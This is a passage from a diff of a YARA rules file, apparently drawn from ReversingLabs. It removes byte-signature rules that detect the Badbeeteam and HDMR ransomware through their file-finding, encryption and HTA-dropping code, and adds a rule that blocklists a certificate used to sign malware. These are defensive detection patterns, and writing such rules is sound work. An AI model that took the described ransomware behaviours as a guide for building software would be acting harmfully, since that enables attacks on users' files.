-		logic_hash = "9b5367655c7c70958332d31524833d96d03027aab693393b19f478a80482abd0"
+		logic_hash = "37f0f64e2d84ef6591e1f07a05abca35b37827d26c828269fb5f38d8546a60a7"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Badbeeteam"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ??
-            8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ??
-            8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57
-            57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ??
-            ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8
-            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ??
-            3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D
-        }
-		$find_files_p2 = {
-            56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ??
-            ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ??
-            75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ??
-            ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2
-            C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            59 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 F1 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ??
-            51 E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 89 D6 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ??
-            ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? FF 04 24 51 57 E8 ?? ?? ?? ?? 58 59 8D 8C
-            24 ?? ?? ?? ?? 8D 54 24 ?? 57 E8 ?? ?? ?? ?? 58 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ??
-            ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 8D 84 24 ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 31 C0 C7 44 24 ?? ?? ?? ?? ?? 40 89
-            84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? 59 89 D6 B9 ?? ?? ?? ?? 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 59 5A 89 F9 89 C3
-            E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 6A ?? 59 8D 7C 24 ?? 8D B4 24 ?? ?? ?? ?? F3
-            A5 6A ?? 59 8D BC 24 ?? ?? ?? ?? 8D 74 24 ?? 31 C0 F3 A5 E9 ?? ?? ?? ?? 8B 84 24 ??
-            ?? ?? ?? 85 C0 74 ?? 8B 8C 24 ?? ?? ?? ?? 50 FF 11 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B
-            70 ?? 8B 78 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 89 C1 89 F2 57 E8 ?? ?? ?? ??
-            58 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 69
-        }
-		$encrypt_files_p2 = {
-            7B ?? ?? ?? ?? ?? 89 C6 83 C6 ?? 85 FF 74 ?? 83 7E ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ??
-            ?? ?? 58 81 C6 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 74 ?? 83 3E ?? 74 ??
-            8D 4E ?? E8 ?? ?? ?? ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58 8B 06 F0 FF 08 75 ?? 56
-            E8 ?? ?? ?? ?? EB ?? 53 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ?? 85 C9 74 ??
-            8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59
-            6B 5B ?? ?? 89 C7 89 C6 83 C7 ?? 85 DB 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 83 7E ?? ?? 74
-            ?? 57 E8 ?? ?? ?? ?? 58 83 3F ?? 74 ?? 8D 47 ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58
-            83 C6 ?? 83 C7 ?? 83 C3 ?? EB ?? 8D 84 24 ?? ?? ?? ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ??
-            ?? 58 59 8B 4C 24 ?? 85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D B4 24
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 6B 7E ?? ?? 89 C1 85 FF 74 ?? 8D 59 ?? 83 C1 ?? E8
-            ?? ?? ?? ?? 89 D9 83 C7 ?? 8D 5C 24 ?? EB ?? 56 53 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ??
-            85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 A1 ?? ?? ?? ?? 8B 00 83 F8 ??
-            72 ?? 89 E0 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 C6 89 D7 68 ?? ?? ?? ?? 8D 44
-            24 ?? 50 E8 ?? ?? ?? ?? 59 59 89 B4 24 ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ??
-            ?? ?? ?? 89 94 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 58 89 44 24 ?? 83 64 24
-            ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 83 C7 ?? 8D 4E ?? E8 ??
-            ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 66 ?? ?? 89 F9 E8 ?? ?? ?? ?? 8D 65 ?? 5E 5F 5B 5D
-            C3
-        }
-		$drop_hta_file_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 59 89 D3 89 F9 89
-            C2 53 E8 ?? ?? ?? ?? 58 8D B4 24 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 58 31 DB 43 53 57 E8 ?? ?? ?? ?? 59
-            5A 53 89 DF 50 E8 ?? ?? ?? ?? 59 5A 8D 5C 24 ?? 89 C2 89 D9 56 E8 ?? ?? ?? ?? 58 39
-            3B 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ??
-            ?? F2 0F 11 44 24 ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 89
-            84 24 ?? ?? ?? ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 40 89
-            84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ??
-            ?? EB ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            8D BC 24 ?? ?? ?? ?? 57 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F1 E8 ??
-            ?? ?? ?? 57 E8 ?? ?? ?? ?? 58 6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A
-        }
-		$drop_hta_file_p2 = {
-            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58
-            31 DB 43 53 56 E8 ?? ?? ?? ?? 59 5A 53 50 E8 ?? ?? ?? ?? 59 5A 8D 74 24 ?? 89 C2 89
-            F1 57 E8 ?? ?? ?? ?? 58 39 1E 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D
-            74 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            89 54 24 ?? 40 89 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89
-            84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 44 24 ?? 89 44 24 ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 74 24 ?? 56 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 89 D9 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59
-            8D BC 24 ?? ?? ?? ?? 89 C3 89 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 F9 6A ?? E8 ?? ??
-            ?? ?? 58 83 64 24 ?? ?? 83 64 24 ?? ?? 57 E8 ?? ?? ?? ?? 59 8D 4C 24 ?? 51 56 6A ??
-            68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 53 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $drop_hta_file_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TIM Konstrakshn, TOV" and pe.signatures [ i ] . serial == "66:c7:58:a2:2b:fb:bc:e3:27:61:68:15:61:6d:dd:07" and 1469404800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_HDMR : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E61B0366D940896430Bcfe3E93Baac5B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HDMR ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "97b5020c-6cb1-5ec6-84a4-2f35eae761c2"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "24eb38c1-48a5-5d9b-a42d-345c4fda6c36"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HDMR.yara#L1-L161"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15058-L15076"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "035c6596db8dc14a663679c1f7e682b85963927cc034b01e390cc22fdee3334a"
+		logic_hash = "1b1fd0c2237446ab22c7359d1e89d822a4b9b6ad345447740154d7d52635c2ea"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HDMR"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 8B 75 ?? 57 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 74 24 ??
-            66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ??
-            ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB
-            ?? 8D 49 ?? 8B 74 24 ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ??
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8D 44 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83
-            C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
-        }
-		$find_files_p2 = {
-            54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4C 24
-            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24
-            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 68
-            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 54 24 ?? 68 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D
-            8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52
-            56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83
-            C4 ?? 85 F6 74 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            8B 0D ?? ?? ?? ?? 83 C4 ?? 3B 0D ?? ?? ?? ?? 7C ?? 8D 49 ?? 6A ?? FF 15 ?? ?? ?? ??
-            8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? FF D7 FF 05 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF D3 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 56 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D
-            C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 33 C0 8B D9 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 5C 24 ?? 66
-            89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? BF ?? ??
-            ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ??
-            ?? 83 C6 ?? 83 C7 ?? 81 FE ?? ?? ?? ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51
-            53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 8C ?? ?? ?? ?? 8B
-            7C 24 ?? 7F ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B F0 89 7C 24 ?? 89 74 24 ?? 85 C0 7C ??
-            7F ?? 83 FF ?? 76 ?? 6A ?? 6A ?? 6A ?? 53 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            33 C0 50 8D 54 24 ?? 52 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 88 44 24 ?? 6A ?? 8D
-            44 24 ?? 50 53 C6 44 24 ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C7 83 E8
-            ?? 8B CE 83 D9 ?? 33 F6 39 44 24 ?? 75 ?? 3B F1 75 ?? 8B 4C 24 ?? 3B 0D ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 C6 44
-        }
-		$encrypt_files_p2 = {
-            24 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ??
-            ?? ?? ?? 40 88 44 34 ?? 46 83 FE ?? 7C ?? 8B 44 24 ?? BE ?? ?? ?? ?? 85 C0 0F 8F ??
-            ?? ?? ?? 0F 8C ?? ?? ?? ?? 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 85 C0 0F 8C ?? ?? ??
-            ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 85 C0 7F ?? 7C ?? 3B FE 73 ?? 6A ?? 6A ?? 50 57 E8
-            ?? ?? ?? ?? 8B F7 2B F0 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44 24
-            ?? 3B F8 74 ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 74 24 ??
-            75 ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 8D 4C 24 ?? 51 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15
-            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ??
-            ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83
-            C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 68 ?? ??
-            ?? ?? 50 57 E8 ?? ?? ?? ?? 8B C8 89 44 24 ?? B8 ?? ?? ?? ?? F7 E9 C1 FA ?? 8B C2 C1
-            E8 ?? 03 C2 69 C0 ?? ?? ?? ?? 8B D1 2B D0 85 D2 7E ?? 41 89 4C 24 ?? 33 C0 89 44 24
-            ?? 3B C8 0F 8E ?? ?? ?? ?? 89 44 24 ?? EB ?? 90 8B 7C 24 ?? 8B 44 24 ?? 8B 4C 24
-        }
-		$encrypt_files_p3 = {
-            99 2B F8 1B CA 89 7C 24 ?? 89 4C 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ??
-            ?? 8B C6 99 3B CA 7F ?? 7C ?? 3B F8 73 ?? 6A ?? 6A ?? 51 57 E8 ?? ?? ?? ?? 8B F7 2B
-            F0 85 F6 0F 8E ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44
-            24 ?? 3B F8 0F 84 ?? ?? ?? ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 39 74 24 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B CE F7 D9 51 53 FF 15 ??
-            ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 52 56 57 53 FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7C
-            24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 8B 44 24 ?? 81 44 24 ?? ?? ?? ?? ?? 40 89 44 24 ?? 3B 44 24 ?? 0F 8C
-            ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? 85 FF 74 ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 68
-        }
-		$encrypt_files_p4 = {
-            8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D
-            74 24 ?? 8D BC 24 ?? ?? ?? ?? F3 A5 8B 4C 24 ?? 6A ?? 89 8C 24 ?? ?? ?? ?? 8B D0 8D
-            4C 24 ?? 51 C1 FA ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 52 53 C7 44 24 ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 94 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 5F 5E
-            5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 8B 8C
-            24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_MS_xchange_backups_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ??
